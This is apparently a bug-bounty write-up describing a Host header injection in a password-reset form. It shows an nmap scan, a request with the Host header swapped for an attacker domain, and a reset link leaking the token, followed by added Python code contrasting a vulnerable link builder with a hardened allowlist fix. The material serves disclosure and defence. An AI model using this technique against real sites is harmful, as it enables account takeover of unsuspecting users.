How I was able to steal the password reset token of any user, with severity "P2"
Hey, I'm abhishekmorla, just a beginner in bug hunting.
Here we go:
This article is about a vulnerability (Host Header Injection) I was able to find in a BugCrowd private program. The scope was amazing: a whole IP range, 2xx.xxx.xx.xxx/28.
So I quickly scanned the range with nmap for open port 80 (grepable output to stdout, filtered for open ports):
nmap -p80 2xx.xxx.xx.xxx/28 -oG - | grep 80/open
and the results were:
Host: 2xx.xxx.xx.xx1 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx2 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx3 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx4 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx5 () Ports: 80/open/tcp//http///
Host: 2xx.xxx.xx.xx6 () Ports: 80/open/tcp//http///
I opened some of the above IPs in my browser and one of them redirected to a login page. From there I went to the reset password page, where I entered the victim's email address.
POST request:
POST /passwords/forgot HTTP/1.1
Host: mysite.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 626
Connection: close
Cookie: _ga=GA1.2.2543534.34543563; ajs_user_id=null; ajs_group_id=null; _gcl_au=1.1.467456.1568844739; ei_client_id=13423rf46534g…….
I entered the victim's email and captured the request in Burp. By changing the Host header to mysite.com (an attacker-controlled domain), the victim will receive an email with a password reset link built from that host.
Response:
HTTP/1.0 302 Found
Cache-Control: no-cache
Content-Length: 134
Content-Type: text/html; charset=utf-8
Date: Fri, 18 Sep 2020 14:20:51 GMT
Location: https://mysite.com
Server: nginx
Connection: close
That email contains the password reset token (shown below). When the victim clicks the link, the attacker is able to obtain the token and thus reset the password.
Click on the following link to reset your password:
http://www.mysite.com/passwords/forgot/a248d8b06e7b25a116851234f454yt0d9fb197dadc04f30185512eecc811
In this way the victim receives the malicious link in their email and, when they click it, the user's password reset link/token leaks to the attacker's site (mysite.com), leading to full account takeover.
Thanks for reading!
LinkedIn: https://www.linkedin.com/in/abhishekmorla/
Twitter: https://twitter.com/abhishekmorla
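The root cause here is an application that builds the reset link from the client-supplied Host header. The following is an added example, not code from the original post or from the affected program: a minimal Python model of the vulnerable link builder next to a hardened version that rejects unexpected hosts and builds the link from configuration only. The hostnames (app.example.com, attacker.example), the path and the allowlist are constructed for illustration.

```python
# Added example (not from the original post): why a password-reset endpoint
# that trusts the Host header leaks tokens, and how to harden it.
import re
import secrets
from urllib.parse import urlunsplit

# Assumed deployment configuration: the public hostname is fixed in config
# and never derived from the incoming request.
CANONICAL_HOST = "app.example.com"
ALLOWED_HOSTS = frozenset({"app.example.com", "www.app.example.com"})
_HOSTNAME_RE = re.compile(
    r"^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$"
)
RESET_PATH = "/passwords/forgot/"  # constructed path for the example


def new_reset_token() -> str:
    """Unguessable token; it is only as safe as the host the link points to."""
    return secrets.token_hex(32)


def reset_link_vulnerable(headers: dict, token: str) -> str:
    """The pattern behind the finding: the link's host comes straight from the
    attacker-controllable Host header, so a forged request yields an e-mail
    that sends the victim (and the token) to whatever host was supplied."""
    host = headers.get("Host", CANONICAL_HOST)
    return urlunsplit(("https", host, RESET_PATH + token, "", ""))


def normalize_host(raw: str) -> str:
    """Lower-case the value, drop an explicit port and a trailing dot."""
    host = raw.strip().lower()
    if host.startswith("["):  # IPv6 literal; never in our allowlist anyway
        return host
    host = host.split(":", 1)[0]
    return host.rstrip(".")


def host_is_allowed(headers: dict) -> bool:
    """Allowlist check meant to run on every request (e.g. in middleware), so
    a request carrying a foreign Host header is refused before any link is
    built or any e-mail is queued."""
    host = normalize_host(headers.get("Host", ""))
    return bool(_HOSTNAME_RE.match(host)) and host in ALLOWED_HOSTS


def reset_link_hardened(headers: dict, token: str) -> str:
    """Fix: reject unexpected hosts, then build the link from configuration
    only. Forwarding headers such as X-Forwarded-Host are ignored as well."""
    if not host_is_allowed(headers):
        raise ValueError("untrusted Host header: %r" % headers.get("Host"))
    return urlunsplit(("https", CANONICAL_HOST, RESET_PATH + token, "", ""))


if __name__ == "__main__":
    token = new_reset_token()
    forged = {"Host": "attacker.example"}   # constructed attacker-controlled value
    legit = {"Host": "app.example.com"}
    print(reset_link_vulnerable(forged, token))  # host taken from the request
    print(reset_link_hardened(legit, token))     # host taken from config
    try:
        reset_link_hardened(forged, token)
    except ValueError as exc:
        print("rejected:", exc)
```

The allowlist check is the same control that frameworks expose as a trusted-hosts setting; the second half of the fix, building absolute URLs from a configured base rather than from the request, is what removes the dependency on the header altogether. A request whose Host header fails the check is also a cheap thing to alert on, since legitimate browsers never send one.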